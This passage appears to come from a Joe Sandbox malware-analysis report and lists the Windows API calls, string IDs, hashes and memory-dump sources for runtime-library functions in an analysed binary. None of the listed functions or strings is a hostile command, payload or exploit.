                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___except_validate_context_record
                                                                                                          • String ID: csm$csm$&p
                                                                                                          • API String ID: 3493665558-454717502
                                                                                                          • Opcode ID: d3aac803e0c6f8321bfc1f54c26d78a7774694e9a2a0d8409d0c6050c1a46a67
                                                                                                          • Instruction ID: 345519222043bf1f34c952ff1fca0cbf0334fe1d4b39f699649a4c1b378ec7a3
                                                                                                          • Opcode Fuzzy Hash: d3aac803e0c6f8321bfc1f54c26d78a7774694e9a2a0d8409d0c6050c1a46a67
                                                                                                          • Instruction Fuzzy Hash: 7731CC36500219AFCF229F58C8458EA7B66FB08714B28855AF944092E3C33ACCF3DB91
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 007055F1
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 007055FB
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::_Lockit.LIBCPMT ref: 006F4DBE
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::~_Lockit.LIBCPMT ref: 006F4DE9
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0070566C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1383202999-2011850372
                                                                                                          • Opcode ID: aa87a6c19074fd11f1a6c513aaf95f77244ffff2be2f5ba1a8b179b6ce9c5a4b
                                                                                                          • Instruction ID: a9dcc11621ff24811682c0642929989ea205b069bfe4ea7dd3f6c71876cf897a
                                                                                                          • Opcode Fuzzy Hash: aa87a6c19074fd11f1a6c513aaf95f77244ffff2be2f5ba1a8b179b6ce9c5a4b
                                                                                                          • Instruction Fuzzy Hash: 90110435900119DBCB05EB64D819ABE7BF2AF80720F680608E4006B2D1CF3D9E01CB84
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0071DDCD,00000000,?,007321B8,?,?,?,0071DD04,00000004,InitializeCriticalSectionEx,0072808C,00728094), ref: 0071DD3E
                                                                                                          • GetLastError.KERNEL32(?,0071DDCD,00000000,?,007321B8,?,?,?,0071DD04,00000004,InitializeCriticalSectionEx,0072808C,00728094,00000000,?,00712E6C), ref: 0071DD48
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0071DD70
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                          • String ID: api-ms-
                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                          • Opcode ID: 32b53683ee2bf5b975a36b8e3048456f7b262cc48e8bb4a3dc03189e5214a34e
                                                                                                          • Instruction ID: b001d492d50824619e3bc180c5a69e7dceb9f48c8a95a175ba6dc0dc59c47050
                                                                                                          • Opcode Fuzzy Hash: 32b53683ee2bf5b975a36b8e3048456f7b262cc48e8bb4a3dc03189e5214a34e
                                                                                                          • Instruction Fuzzy Hash: 6AE01A70380605F6EB301BA5EC0ABA93B54AB10B45F208461F98CA80E1E76EACA1D949
                                                                                                          APIs
                                                                                                          • GetConsoleOutputCP.KERNEL32(48E58DFA,00000000,00000000,?), ref: 0071B13A
                                                                                                            • Part of subcall function 007132D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00714A78,?,00000000,-00000008), ref: 00713332
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0071B38C
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0071B3D2
                                                                                                          • GetLastError.KERNEL32 ref: 0071B475
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 2112829910-0
                                                                                                          • Opcode ID: ec9c8e8d9f53f17649a33660ceb4a825827a4b4aa9895108e041c39969034fea
                                                                                                          • Instruction ID: 2705436d6af29f957f823739a84c26a92a52faa295265218476ccfb77aa33f76
                                                                                                          • Opcode Fuzzy Hash: ec9c8e8d9f53f17649a33660ceb4a825827a4b4aa9895108e041c39969034fea
                                                                                                          • Instruction Fuzzy Hash: 91D17EB5D00248DFCB15CFA8D8949EDBBB4FF49314F24816AE856EB392D734A942CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 007132D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00714A78,?,00000000,-00000008), ref: 00713332
                                                                                                          • GetLastError.KERNEL32 ref: 00718F67
                                                                                                          • __dosmaperr.LIBCMT ref: 00718F6E
                                                                                                          • GetLastError.KERNEL32 ref: 00718FA8
                                                                                                          • __dosmaperr.LIBCMT ref: 00718FAF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 1913693674-0
                                                                                                          • Opcode ID: 565a02a586bc9027e42023e9110feba70035b159d38d291f2e651a31ac661a4e
                                                                                                          • Instruction ID: 8a47cc9f90bb5b0b12974a6fd744d818006b92559a53812cff084fe75277c1dd
                                                                                                          • Opcode Fuzzy Hash: 565a02a586bc9027e42023e9110feba70035b159d38d291f2e651a31ac661a4e
                                                                                                          • Instruction Fuzzy Hash: 21219B71604205EFDB60AF698845CABB7AEFF14364B108919F919971D0DB3CED818B52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 54237984255def5d64a062226e7638fc093b95a66fd764253183976bcafb8faa
                                                                                                          • Instruction ID: e8ae0139d33e4f4978b5d9246ba9cdc0613925198ceb9fd1ea99e63a392881fe
                                                                                                          • Opcode Fuzzy Hash: 54237984255def5d64a062226e7638fc093b95a66fd764253183976bcafb8faa
                                                                                                          • Instruction Fuzzy Hash: 20216F71204205EFDB20AF658885D6A77EDFF45364B108B29FA16972D2E739EC50CB90
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0071A301
                                                                                                            • Part of subcall function 007132D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00714A78,?,00000000,-00000008), ref: 00713332
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0071A339
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0071A359
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 158306478-0
                                                                                                          • Opcode ID: 659c851af8fe29c217e42daf6df4da15be10a45126ee61ab7108aa9cc49133a7
                                                                                                          • Instruction ID: 5902e21e2a8b00c437abc337de1796f8f2fba83cea9f0cc6e9eee4d68ce699af
                                                                                                          • Opcode Fuzzy Hash: 659c851af8fe29c217e42daf6df4da15be10a45126ee61ab7108aa9cc49133a7
                                                                                                          • Instruction Fuzzy Hash: BE11D6F2902619BFA721377D5C8EDEF2A9CEE443947210124F415D1181FA2CDE819276
                                                                                                          APIs
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000), ref: 007221F7
                                                                                                          • GetLastError.KERNEL32(?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000,?,?,?,0071AE0F,?), ref: 00722203
                                                                                                            • Part of subcall function 00722254: CloseHandle.KERNEL32(FFFFFFFE,00722213,?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000,?,?), ref: 00722264
                                                                                                          • ___initconout.LIBCMT ref: 00722213
                                                                                                            • Part of subcall function 00722235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007221D1,007216BC,?,?,0071B4C9,?,00000000,00000000,?), ref: 00722248
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,007216CF,00000000,00000001,?,?,?,0071B4C9,?,00000000,00000000,?), ref: 00722228
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                          • String ID:
                                                                                                          • API String ID: 2744216297-0
                                                                                                          • Opcode ID: c3465759d21e69fef68dac549f8d76810e9358c1a28abbe7f9cf0710f3ded974
                                                                                                          • Instruction ID: 9ec4ba48eabb14d153ea36a4283fc248e4160f72164ac6483f98988d185c11d6
                                                                                                          • Opcode Fuzzy Hash: c3465759d21e69fef68dac549f8d76810e9358c1a28abbe7f9cf0710f3ded974
                                                                                                          • Instruction Fuzzy Hash: AEF03036500125FBCF322F91EC0899A7F66FB093E1B068110FE1895131C73ACD22EB95
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0070D04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00717BA2
                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0070D04D,?,?,?,00000055,?,-00000050,?,?), ref: 00717BD9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                          • String ID: utf8
                                                                                                          • API String ID: 943130320-905460609
                                                                                                          • Opcode ID: 9eed5722c2fb14f4a7023777117901f4dfd32ae1b2cbbe33eb25e5639a223ec8
                                                                                                          • Instruction ID: 7ca79e30c7f6bee015b7cadf0695f75ed04bac13922f46bd9209eca36d1bec93
                                                                                                          • Opcode Fuzzy Hash: 9eed5722c2fb14f4a7023777117901f4dfd32ae1b2cbbe33eb25e5639a223ec8
                                                                                                          • Instruction Fuzzy Hash: E351A271608305AADB39AF78CC86BE673B8AF44740F144469FA059B1C1EB78DAC0C6F5
                                                                                                          APIs
                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00712B4B,?,?,00000000,00000000,00000000,?), ref: 00712C6F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EncodePointer
                                                                                                          • String ID: MOC$RCC
                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                          • Opcode ID: b1922e2d8d7e34f6a94906914d0177cc945b973b2f49212884dad69673fd645f
                                                                                                          • Instruction ID: 8b9a61e9876d1901028b4a7097a0d4a51419b12f4f39f21833e761ea94dacef4
                                                                                                          • Opcode Fuzzy Hash: b1922e2d8d7e34f6a94906914d0177cc945b973b2f49212884dad69673fd645f
                                                                                                          • Instruction Fuzzy Hash: E5418D71A00209EFCF25DF98DD81AEEBBB5FF48304F144159FA0467292D33999A2DB51
                                                                                                          APIs
                                                                                                          • __alloca_probe_16.LIBCMT ref: 00703114
                                                                                                          • RaiseException.KERNEL32(?,?,?,?), ref: 00703139
                                                                                                            • Part of subcall function 00707223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00705F93,?,?,?,?,00705F93,00001000,0072E1AC,00001000), ref: 00707284
                                                                                                            • Part of subcall function 0070F7B9: IsProcessorFeaturePresent.KERNEL32(00000017,0070A37B,?,?,?,?,00000000), ref: 0070F7D5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                          • Opcode ID: c5a701cf5a2c2af8dbde39289d965c0acf855289a21bd105ca1e6084b3ed9c4e
                                                                                                          • Instruction ID: d08952085c064cf3593fbf1f5c6ea19f0b88b95e06b5975774926c6287da6314
                                                                                                          • Opcode Fuzzy Hash: c5a701cf5a2c2af8dbde39289d965c0acf855289a21bd105ca1e6084b3ed9c4e
                                                                                                          • Instruction Fuzzy Hash: 3921AC32D0121CEBCF24DFD9D889AAEB7F9EF08710F140609E405AB690C738AE45CB91
                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0070288E
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 007028EA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 593203224-2011850372
                                                                                                          • Opcode ID: 6b37727daba47a4e712535a4679772574bf2cf0862c137dbfee7e6bafb339080
                                                                                                          • Instruction ID: e770f920fbe517fe8bcdceccd89e76d08a0c05097b54847a994bf567538f1beb
                                                                                                          • Opcode Fuzzy Hash: 6b37727daba47a4e712535a4679772574bf2cf0862c137dbfee7e6bafb339080
                                                                                                          • Instruction Fuzzy Hash: F1018C36600218EFCB15DB18C899E9977B8EF84350B1440A9E801AB3E1DB74FE46CB50
                                                                                                          APIs
                                                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 006F51C2
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006F520C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                                                                                          • String ID: <Oo
                                                                                                          • API String ID: 3286764726-2027743973
                                                                                                          • Opcode ID: ff2c69196ce1864e9ada42a47a0e228b79ffdf9dd25cad2aeb9fb52937600be8
                                                                                                          • Instruction ID: 8ee3d9b3c5482025f780d07d55f4a165f233b2adb9676360b3a8c4d72c175666
                                                                                                          • Opcode Fuzzy Hash: ff2c69196ce1864e9ada42a47a0e228b79ffdf9dd25cad2aeb9fb52937600be8
                                                                                                          • Instruction Fuzzy Hash: 8EF059309041489BCB49FBB8D5A567DBB76AE4431CF08006CD60667343EA319A94CB69
                                                                                                          APIs
                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,00705D09,\\p,?,?,?,?,00705C5C,?,00000000,?,006FB93C,?,?,006FD94E), ref: 00706D27
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,48E58DFA,?,?,00723357,000000FF,?,007069F4,?,?,?,?,00706A18,00000000,?), ref: 00706D2B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileSystem$Precise
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 743729956-2011850372
                                                                                                          • Opcode ID: 5960d7e861ab78e2f07920647689978033a2185d746aa84049bffa040cd1864a
                                                                                                          • Instruction ID: aeaf9485a3b82d6b90cb95144c29a57bce0f73a2ffcf22910b7924c30859fe5b
                                                                                                          • Opcode Fuzzy Hash: 5960d7e861ab78e2f07920647689978033a2185d746aa84049bffa040cd1864a
                                                                                                          • Instruction Fuzzy Hash: 41F06572A44564EFCB219F54DC44F5DBBE8F708B14F048626E81293790DB7DA9008BD4
                                                                                                          APIs
                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00713F67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
